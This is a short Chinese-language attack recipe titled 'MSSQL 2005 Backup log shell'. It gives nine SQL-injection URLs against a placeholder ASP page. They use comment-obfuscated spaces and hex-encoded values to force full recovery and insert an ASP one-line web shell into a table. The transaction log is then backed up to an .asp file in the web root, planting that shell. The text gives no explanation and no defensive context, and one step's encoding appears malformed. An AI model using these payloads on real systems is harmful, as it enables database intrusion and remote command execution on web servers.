![]() |
MSSQL 2005 Backup log shell |
第一步 http://www.sb.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]-- 第二步: http://www.sb.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init-- 第三步 http://www.sb.com/test.asp';drop/**/table/**/[itpro]-- 第四步 http://www.sb.com/test.asp';create/**/table/**/[itpro]([a]/**/image)-- 第五步 http://www.sb.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init-- 第六步 http://www.sb.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)-- 第七步 http://www.sb.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init-- 第八步 http://www.sb.com/test.asp';drop/**/table/**/[itpro]-- 第九步 http://www.sb.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init-- |